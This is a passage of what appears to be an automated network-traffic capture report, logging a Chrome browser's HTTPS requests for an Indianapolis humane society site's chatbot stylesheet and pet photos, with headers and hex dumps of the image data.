                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: 76 61 72 20 63 75 73 74 6f 6d 67 70 74 44 65 66 61 75 6c 74 43 53 53 3d 22 2e 63 67 70 74 63 62 2d 62 6f 64 79 20 7b 5c 6e 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 32 31 34 37 34 38 33 30 30 30 3b 5c 6e 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 6e 7d 5c 6e 2e 63 67 70 74 63 62 2d 62 6f 64 79 20 2e 63 67 70 74 63 62 2d 63 68 61 74 2d 63 69 72 63 6c 65 2c 5c 6e 2e 63 67 70 74 63 62 2d 62 6f 64 79 20 2e 63 67 70 74 63 62 2d 63 68 61 74 2d 62 6f 78 2d 74 6f 67 67 6c 65 20 7b 5c 6e 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 5c 6e 20 20 20 20 62 6f 74 74 6f 6d 3a 20 31 72 65 6d 3b 5c 6e 20 20 20 20 6c 65 66 74 3a 20 76 61 72 28 2d 2d 63 68 61 74 62 6f 74 2d 70 6f 73 69 74 69 6f 6e 2d 6c 65 66 74 2c 20 61 75 74 6f 29 3b 5c 6e
                                                                                                                                                                                                                                                        Data Ascii: var customgptDefaultCSS=".cgptcb-body {\n z-index: 2147483000;\n position: fixed;\n}\n.cgptcb-body .cgptcb-chat-circle,\n.cgptcb-body .cgptcb-chat-box-toggle {\n position: fixed;\n bottom: 1rem;\n left: var(--chatbot-position-left, auto);\n
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC9438INData Raw: 31 33 20 32 34 2e 34 31 36 34 20 32 35 2e 33 35 37 33 20 32 34 2e 35 36 33 31 20 32 35 2e 33 39 36 43 32 34 2e 37 31 36 35 20 32 35 2e 34 33 36 33 20 32 34 2e 38 37 36 35 20 32 35 2e 34 35 37 37 20 32 35 2e 30 33 39 39 20 32 35 2e 34 35 37 37 43 32 36 2e 30 37 35 33 20 32 35 2e 34 35 37 37 20 32 36 2e 38 38 39 34 20 32 34 2e 36 35 38 34 20 32 36 2e 38 38 39 34 20 32 33 2e 36 34 30 39 43 32 36 2e 38 38 39 34 20 32 32 2e 36 32 33 36 20 32 36 2e 30 37 35 33 20 32 31 2e 38 32 34 34 20 32 35 2e 30 33 39 39 20 32 31 2e 38 32 34 34 43 32 34 2e 33 30 30 34 20 32 31 2e 38 32 34 34 20 32 33 2e 36 33 34 33 20 32 32 2e 32 36 30 34 20 32 33 2e 33 33 39 20 32 32 2e 39 31 34 33 48 31 39 2e 39 33 36 36 56 32 36 2e 33 32 39 36 48 31 37 2e 31 32 35 35 56 38 2e 38 38 39 39
                                                                                                                                                                                                                                                        Data Ascii: 13 24.4164 25.3573 24.5631 25.396C24.7165 25.4363 24.8765 25.4577 25.0399 25.4577C26.0753 25.4577 26.8894 24.6584 26.8894 23.6409C26.8894 22.6236 26.0753 21.8244 25.0399 21.8244C24.3004 21.8244 23.6343 22.2604 23.339 22.9143H19.9366V26.3296H17.1255V8.8899


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        60192.168.2.44980913.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC622OUTGET /photos/352/e9dac8f4-5d42-4282-b360-1c17bf4033f7.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC534INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 66989
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Sun, 17 Nov 2024 16:59:50 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD07293FEE5917
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: c5dc897e-e01e-0033-483a-629734000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015913Z-156796c549bzzbn9hC1EWR6zf400000015gg000000007xd3
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_MISS
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC15850INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 84 00 03 02 02 03 02 02 03 03 03 03 04 03 03 04 05 08 05 05 04 04 05 0a 07 07 06 08 0c 0a 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 02 30 01 a4 03 01 22 00 02 11 01 03 11 01 ff c4 01 a2 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0
                                                                                                                                                                                                                                                        Data Ascii: JFIF``0"}!1AQa"q2#BR
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: 72 39 4e 0e 31 4d de c0 e7 38 f6 15 58 b1 ed c5 19 6f 7a 2c 17 34 6d 2e 56 39 39 3f 8d 6e c1 2e f1 f7 b3 f4 ae 47 bd 6d d9 48 cb 10 e2 9a 24 df 8e 60 00 ef 8a b7 04 fe 84 d6 34 52 92 bc 0c 55 b8 27 c0 ce 3f 5a a1 1b 5e 76 e0 2b 63 49 8c 6a ea b0 9c fd a6 da 45 78 c8 52 4e d2 79 fc 8e 31 f5 35 cb 7d ac 8e 84 67 de ba 9f 86 fe 22 b1 d2 7c 5f a7 cb a8 13 05 b3 b7 97 24 ab ce dc 9e 09 1e 80 81 5c b8 98 73 d2 7a 1d 38 69 f2 55 4c d7 f1 a4 db af a2 47 da e6 15 e8 83 19 38 c9 fa d7 0b 7d 7e ba 9c 9e 5c 0c 5c 63 00 93 fc b1 5e bf e3 09 b4 ad 6b c4 4c b6 33 41 73 2a 3e d6 11 f1 cf 42 f8 3d 41 18 3c 7a 57 9b 78 a7 43 96 d3 88 e0 c3 03 f3 98 87 0e 3b 1e 3b d7 95 41 ab ea 7b 55 b6 d0 c4 8f 4d b6 ba cd a8 d3 6d 63 b8 61 9f 32 49 a4 66 c8 e7 20 07 c7 e7 53 db eb 56 d6
                                                                                                                                                                                                                                                        Data Ascii: r9N1M8Xoz,4m.V99?n.GmH$`4RU'?Z^v+cIjExRNy15}g"|_$\sz8iULG8}~\\c^kL3As*>B=A<zWxC;;A{UMmca2If SV
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: a9 19 2c 71 f7 8f 51 54 61 b9 b7 d3 cc 8f 71 14 60 3b 31 4c f2 6b 27 5b d6 22 bb 56 58 63 5c 37 f1 d5 58 57 39 bd 5c 2b 4f 11 54 66 06 31 cf 1e a6 a8 ec ff 00 a6 4d fa 54 ba cd f0 82 68 50 ca 01 11 0c f0 7d 4d 50 fe d3 5f f9 ec bf 91 a4 3b 9f 92 f2 81 f5 15 4e 48 81 27 03 f0 ab d2 42 fd 41 cf d6 a1 30 37 7e 2b 8d 1b 33 3e 48 07 5f e5 55 24 52 47 ad 6a 48 99 06 ab bc 1c f2 38 ab 20 cc 29 cf 34 d3 1e 0f 1f 85 5e 7b 61 db ad 30 c4 73 c8 a0 45 65 4e 2a 58 6d 15 d8 06 07 af 55 35 2a c5 8a b3 04 60 f3 8c fd 4d 00 77 7f 0e 8e 91 69 21 59 6d e4 77 eb 97 1b c0 3d b8 1d 6b 77 57 ba fb 2d ec 6d 67 76 f2 02 76 99 2e 38 00 e7 a1 5f f1 ac 0f 00 68 23 54 bb dd 70 d3 08 d4 83 b6 de 32 cc 71 ef d0 57 6f a8 68 90 41 75 19 4b 57 f3 14 e6 39 58 64 fd 0a b7 5a f3 2b 5b 9d 9e
                                                                                                                                                                                                                                                        Data Ascii: ,qQTaq`;1Lk'["VXc\7XW9\+OTf1MThP}MP_;NH'BA07~+3>H_U$RGjH8 )4^{a0sEeN*XmU5*`Mwi!Ymw=kwW-mgvv.8_h#Tp2qWohAuKW9XdZ+[
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: 64 cf 2d c6 4e 70 3a e2 a8 5d f8 70 c9 0c 12 5b 4e b3 92 41 0b 27 2b 9e 33 8e fe 9f 95 76 53 e8 97 d0 3b 4d 7b 67 25 d4 72 a0 0a f1 9f 97 24 13 d3 fa 8a c6 d4 ad 2c ef a0 c9 b7 92 ce e1 1b 63 63 85 27 d9 ba ff 00 fa a9 a6 23 8f 7d 52 71 77 2d a4 d1 66 79 88 0a ae 43 2e 41 eb 93 5c 77 88 fc 17 6f 77 77 1c b7 fa 52 5c 94 71 2b 1e 1c 15 cf a5 7a 1d 86 84 c7 59 92 de 6b d6 1b 41 31 b9 39 24 f6 e7 f0 1c 51 af 68 d7 16 c8 76 5c 82 ae 08 56 df ca e3 af 1f 8f 7a b5 2b 12 e2 9e e7 0d 2e 89 e1 fd 52 ca 5b 76 8e 30 e9 95 d9 24 78 65 1c fe 7d ab 97 b2 f8 79 e1 9d 17 51 9a e2 3d 36 0f 2e 45 1b 63 f2 be 65 3d cf 3d 33 5d 7e 9d a3 de 6b 1a 8b d9 b8 31 5c 28 12 3c 80 81 8c f4 c7 7c d6 be a7 a2 cd a4 d9 32 e1 24 8e 33 96 2f 1f cc de d9 1d 69 f3 bd 85 ca 9f 43 c7 7c 61 e0
                                                                                                                                                                                                                                                        Data Ascii: d-Np:]p[NA'+3vS;M{g%r$,cc'#}Rqw-fyC.A\wowwR\q+zYkA19$Qhv\Vz+.R[v0$xe}yQ=6.Ece==3]~k1\(<|2$3/iC|a
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1987INData Raw: 5c 1f 73 d0 8e d5 7f 02 db 55 84 dc 1c c0 00 c3 9e a7 8e e7 f1 ad 7b bf 0b da 5f 24 d2 ac 60 ca 57 72 82 d8 5f a5 2b 0e ea 24 df d9 b6 ff 00 65 51 6c 53 cb 65 2a 76 75 3c 75 c7 7a e3 f5 4f 0d c9 62 19 ad a7 70 c0 fe f2 54 24 f3 8e 2a 5b fd 26 5d 1c 40 e9 23 65 54 33 c6 ae 7e 52 78 e2 ae 5a 6a 33 49 67 22 fc 86 42 db 3c 96 ce f0 c7 8e 4f a5 26 54 74 ea 63 e8 69 73 76 ad 6f 71 24 b2 b6 fc 33 a3 9f 98 77 cd 5c bc d1 97 4e 05 ec cb c4 3c cc 13 26 54 81 8e a0 77 14 40 2e f4 8b 89 6e d9 ed 9c b6 15 ad df b7 6c 8e f8 ad 5b 8f 10 4f 08 fb 3c f6 e3 cc 00 3a 80 d9 51 9f 7e b8 a8 d8 ab 9c dc 73 5e c2 1f f7 c6 48 d5 f8 39 c1 27 db d8 53 ef ae f5 1d 69 4e 98 b2 ec 79 40 38 66 01 4f d7 dc d6 8e a4 ed 2d b4 ab 3d 87 ee f2 1c bc 72 e3 9e bd 6b 33 40 fb 54 37 37 01 20 4b
                                                                                                                                                                                                                                                        Data Ascii: \sU{_$`Wr_+$eQlSe*vu<uzObpT$*[&]@#eT3~RxZj3Ig"B<O&Ttcisvoq$3w\N<&Tw@.nl[O<:Q~s^H9'SiNy@8fO-=rk3@T77 K


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        61192.168.2.44981013.107.246.454432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC388OUTGET /photos/352/a625a6f1-50ea-4357-b907-a08d636341db.jpg HTTP/1.1
                                                                                                                                                                                                                                                        Host: g.petango.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC555INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: image/jpeg
                                                                                                                                                                                                                                                        Content-Length: 110502
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Last-Modified: Sun, 17 Nov 2024 02:53:03 GMT
                                                                                                                                                                                                                                                        ETag: 0x8DD06B2F465FC55
                                                                                                                                                                                                                                                        Vary: Origin
                                                                                                                                                                                                                                                        x-ms-request-id: 8542a90a-301e-000f-083a-62bef3000000
                                                                                                                                                                                                                                                        x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                        x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                        x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                        x-azure-ref: 20250109T015913Z-156796c549bs847bhC1EWRsft000000015h00000000072vc
                                                                                                                                                                                                                                                        Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC15829INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 0b bb 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 0e 00 12 01 03 00 01 00 00 00 01 00 00 00 28 01 03 00 01 00 00 00 02 00 00 00 13 02 03 00 01 00 00 00 01 00 00 00 0f 01 02 00 06 00 00 00 b6 00 00 00 10 01 02 00 0e 00 00 00 bc 00 00 00 1a 01 05 00 01 00 00 00 ca 00 00 00 1b 01 05 00 01 00 00 00 d2 00 00 00 31 01 02 00 07 00 00 00 da 00 00 00 32 01 02 00 14 00 00 00 e1 00 00 00 3c 01 02 00 0e 00 00 00 f5 00 00 00 1a 01 05 00 01 00 00 00 03 01 00 00 1b 01 05 00 01 00 00 00 0b 01 00 00 69 87 04 00 01 00 00 00 13 01 00 00 25 88 04 00 01 00 00 00 92 0a 00 00 00 00 00 00 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 34 20 50 72 6f 00 48 00 00 00 01 00 00 00 48 00 00 00 01 00 00 00 31 38 2e 30 2e 31 00
                                                                                                                                                                                                                                                        Data Ascii: JFIFHHExifII*(12<i%AppleiPhone 14 ProHH18.0.1
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: 3c 6d a9 45 75 70 6f f5 68 e7 e2 10 76 11 26 08 5d b8 5f 4c 74 3d 0f 35 fa 23 e2 af 0f ae b9 34 56 76 d0 24 32 5d 2c 5f 67 53 32 7c d2 33 7a 67 a0 6d bd 07 ad 79 ad cf c3 6f 06 f8 93 e2 7c 3e 38 d1 62 92 4b a8 61 7b 49 d2 48 80 8d dd 0e d3 32 76 65 60 08 07 d3 9e f5 f6 bc 17 95 d7 cd b1 b0 cb e3 37 18 49 fb cf a4 56 ed ff 00 97 99 e0 71 36 65 47 2f c2 4b 14 e3 cd 38 ad 17 56 fa 1e 01 e1 7d 7a 01 71 32 5e 22 c5 35 c4 85 b6 82 70 41 ef fd 2b b0 d5 b5 68 d1 a2 b7 8f 0b fc 47 6f bf ff 00 5a ba cd 63 e1 05 c5 cf 88 ff 00 b4 b4 4d b6 2e 39 68 db 02 26 f5 03 d0 d7 0f e2 75 ba d2 ee 56 c7 5c d3 a4 49 23 5c 09 58 60 e3 d4 30 ed 5f da b8 1c 66 17 2e c1 c7 03 4a 69 46 09 28 fa 23 f9 73 13 43 11 8c c4 bc 55 58 b7 29 3b bf 53 52 d3 52 74 92 15 12 62 2e e4 d5 9d 53 51
                                                                                                                                                                                                                                                        Data Ascii: <mEupohv&]_Lt=5#4Vv$2],_gS2|3zgmyo|>8bKa{IH2ve`7IVq6eG/K8V}zq2^"5pA+hGoZcM.9h&uV\I#\X`0_f.JiF(#sCUX);SRRtb.SQ
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: dd 6a 41 b9 e7 cb a6 6a 5e 43 b3 f9 58 ca fa 10 7a 1c 56 94 37 d2 dd 4c b1 a0 65 52 e1 78 23 bd 42 2d c6 ab a7 ac e2 4f de 42 80 10 dd 00 ff 00 22 b6 f4 3d 02 ee f6 e9 6d 96 d8 5e 09 c1 09 14 72 16 39 c6 41 e3 bf 4f ca b0 93 89 d1 4e 32 67 ad 78 0a cd c7 88 34 e2 91 e5 72 19 c3 c6 5a 32 99 2c c5 80 20 f1 8e 08 23 f0 af ba 3c 19 a2 78 4a 2f 12 dc 36 99 a8 41 76 6e 5d ad 9a de 08 d9 23 b6 6d bb 44 de 69 0c c5 37 b2 f2 a0 30 1f 79 79 15 f0 47 87 26 bc f0 b4 93 8b a1 34 01 b7 46 c5 94 ee 03 a6 06 0f 5d a7 20 73 eb f5 fb 1f e1 45 f6 9b 65 35 8c 3a ce a1 77 7a da d2 98 e4 02 10 c1 95 64 e0 6f 40 a5 64 c9 24 01 c6 38 24 67 15 e3 e3 5b 71 b2 3d 7c 2c 2d ab 3e c4 b7 d7 ec ac 20 f0 f5 c6 b7 6a fa 5e 87 a9 ca ad 63 38 8c f9 6b 19 c0 0f bf 97 90 13 18 1e 60 c1 ce 4f
                                                                                                                                                                                                                                                        Data Ascii: jAj^CXzV7LeRx#B-OB"=m^r9AON2gx4rZ2, #<xJ/6Avn]#mDi70yyG&4F] sEe5:wzdo@d$8$g[q=|,-> j^c8k`O
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: e1 cc da 7e a9 e7 79 ad 14 bf 75 b2 06 08 f4 ad 5b 9f 00 44 ba 84 77 7c 79 a0 f0 ca d5 9b 6b da 73 36 74 53 c0 bd e4 ec 7d 03 e1 a4 4f f8 45 a0 2b c9 d9 d6 bd 5b 4a 88 ff 00 64 c5 91 90 53 d3 da be 7c d2 fc 48 34 3d 1e de de e2 26 29 9c 13 8e 2b e9 bf 0a 4b 63 ab 78 56 de e2 06 0c 08 c6 01 af b6 c1 e3 a9 54 5e eb b9 e5 d7 c3 ca 32 38 9d 77 c3 36 5a b6 81 3c 33 db f9 88 4b 02 07 04 71 d4 57 cc 5a bf c0 6d 22 2d 42 69 ad ee 0c 5e 63 64 81 27 96 79 f5 07 8a fb dd b4 c8 3c b7 53 c0 26 b1 6f b4 1b 09 e1 1b 80 62 00 ea 2b a2 ab a7 35 69 23 1e 59 1f 99 fe 28 fd 9a 5b 50 94 ec d4 a7 5c 13 80 93 21 af 3a d4 ff 00 65 fd 72 d3 4c 2d 6f 7b 2b ab 2e 57 7c 61 81 1f 55 af d6 3d 57 c2 fa 53 af 99 24 49 c9 fe e0 35 9e fe 15 d1 26 d1 ad bf 77 e5 91 18 1b a3 25 7a 56 7e d6
                                                                                                                                                                                                                                                        Data Ascii: ~yu[Dw|yks6tS}OE+[JdS|H4=&)+KcxVT^28w6Z<3KqWZm"-Bi^cd'y<S&ob+5i#Y([P\!:erL-o{+.W|aU=WS$I5&w%zV~
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: b4 d6 a5 e2 dd 7c fd aa da cd cd ce 24 1b 90 be ec 20 39 f4 1d 3e 95 f4 b9 45 38 d2 6f 11 2e 87 87 99 49 d5 4a 8a 7b 9e 47 e2 5d 2f c6 56 f6 df da 5a 8e 93 a8 46 f7 48 64 49 25 85 80 e7 92 d9 ea 3e a7 9a e9 34 2f 0e 6a 5e 3b bd f1 76 87 a2 5b 8b bd 76 e6 15 96 de 13 32 47 bb e6 85 d8 ee 62 14 7c a1 ba 9e d5 fa 4f e2 db 8f 03 af 80 2f 34 fd 7a f6 d6 da ce ee 06 59 4d c4 a8 8d b1 87 cd d7 a7 b5 7e 6d bf 89 3c 1b e1 0f da 8f c4 91 59 5e df 5c f8 4a 58 d6 3b 5d 47 4b c4 93 c4 82 31 b5 d7 24 2b 15 75 52 43 75 0a 46 46 6b dd c2 e6 13 c5 4b de 56 3c 5c 66 0e 9e 15 c6 4f 55 7d 7b 9f 60 fc 2e fd 93 6d bc 3f a6 db df f8 bf c3 97 5a e6 aa ca 18 da cc e2 38 a2 3e 98 cf 3f 53 5d e4 7f b0 7d e7 8c be 2c c1 ad cf e2 38 fc 1f a2 79 ca f1 69 fa 7d 80 77 03 39 fb ce d8 03
                                                                                                                                                                                                                                                        Data Ascii: |$ 9>E8o.IJ{G]/VZFHdI%>4/j^;v[v2Gb|O/4zYM~m<Y^\JX;]GK1$+uRCuFFkKV<\fOU}{`.m?Z8>?S]},8yi}w9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC16384INData Raw: 3c 9a a5 35 c8 93 b3 5b e9 dc de fd 95 7c 71 ae d9 7c 73 87 c2 b8 b9 d4 7c 3d a9 c0 ff 00 69 03 73 ad 9b 20 2c 92 e4 f0 a0 e3 69 f5 cd 77 7f b6 27 8f 6e fc 23 a1 78 0b c3 90 cd 25 a5 86 af f6 b9 ee 9d 18 8d ea 92 20 c7 fe 3d c8 ae 73 f6 36 d4 f4 68 ad 3c 5d 60 d3 bc 7e 22 b9 64 91 22 72 a2 27 81 7e 55 d9 df 76 e6 6c fb 11 58 9f b7 15 b4 3a 96 b3 f0 91 2f a4 68 bc b8 35 03 b4 8e 46 64 8b 8f e9 f8 55 d0 c3 c6 9e 5b 2a 92 95 ef ad ba 2d 6d a1 f3 5c 55 8a f6 dc 50 a8 c2 9a 8f 2a b5 fa cb 4b dd fe 48 ad f0 b3 c4 3e 07 be d2 63 be b2 57 49 6d 63 c6 1c 64 f1 c9 fc eb 33 f6 b1 f1 d5 9f 88 3f 66 0d 07 4d b2 91 23 88 eb 28 f2 45 8c 37 ca 87 07 f5 af 17 f0 05 cd ce 81 aa 86 b0 08 2d 98 7c cc e4 05 c7 4c 93 5c e7 c7 7f 12 c1 ab e9 7a 14 16 d1 a0 45 91 d9 a4 8c 7c b2
                                                                                                                                                                                                                                                        Data Ascii: <5[|q|s|=is ,iw'n#x% =s6h<]`~"d"r'~UvlX:/h5FdU[*-m\UP*KH>cWImcd3?fM#(E7-|L\zE|
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC12753INData Raw: 49 26 03 70 4c 1c 98 f2 3a 63 bf e3 5f 4c 69 6b 77 f1 0f c6 31 f8 bb 54 85 ed fc 3b 68 ec 3c 3d 63 20 21 98 63 1f 69 90 7a 91 9d 99 fb ab 93 5e 8f 35 bc 92 da b4 77 30 46 f6 fb 09 8d 24 88 6c 54 c6 37 60 fb 67 1e 82 b7 a5 37 49 59 f5 32 a9 05 51 dd 1d d7 ec b7 f1 4f c3 fe 1c d7 be 2d fc 6b f1 5d f4 30 27 87 fc 0b 25 b6 8e 97 43 0b 2d cc a3 66 d8 c7 72 4b 0e 07 35 f5 87 c1 8f 8a 5e 02 d6 74 dd 05 34 9f 15 da 4f 7f 23 05 8d e6 f9 4f 05 9b 2d 9e 99 61 9e bd eb f2 bb c4 3f 0a a7 f1 4e 85 aa db 78 6e fe 5f 0d 5b 5d a8 26 d6 26 2b 6f 7a 47 2b e6 20 38 07 3c e7 b0 02 b9 0f 05 e9 7e 32 f0 1d d3 68 de 23 d0 ae ee 2c 56 7f 2a 1d 4a cd 4c b1 06 18 3c 32 f3 dc 76 af 3a b6 06 33 e6 9a 96 a7 5c 31 73 8d a1 25 a2 3f a0 fd 33 e2 bd cf 8b 3f 6b 1b 0f 07 f8 6a e2 38 ec b4
                                                                                                                                                                                                                                                        Data Ascii: I&pL:c_Likw1T;h<=c !ciz^5w0F$lT7`g7IY2QO-k]0'%C-frK5^t4O#O-a?Nxn_[]&&+ozG+ 8<~2h#,V*JL<2v:3\1s%?3?kj8


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        62192.168.2.449817192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC392OUTGET /wp-content/uploads/2021/05/hero-dog.png HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC592INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: image/png
                                                                                                                                                                                                                                                        Content-Length: 134432
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/uploads/2021/05/hero-dog.png>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Wed, 30 Nov 2022 17:59:37 GMT
                                                                                                                                                                                                                                                        Expires: Thu, 16 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=604800
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca HIT
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
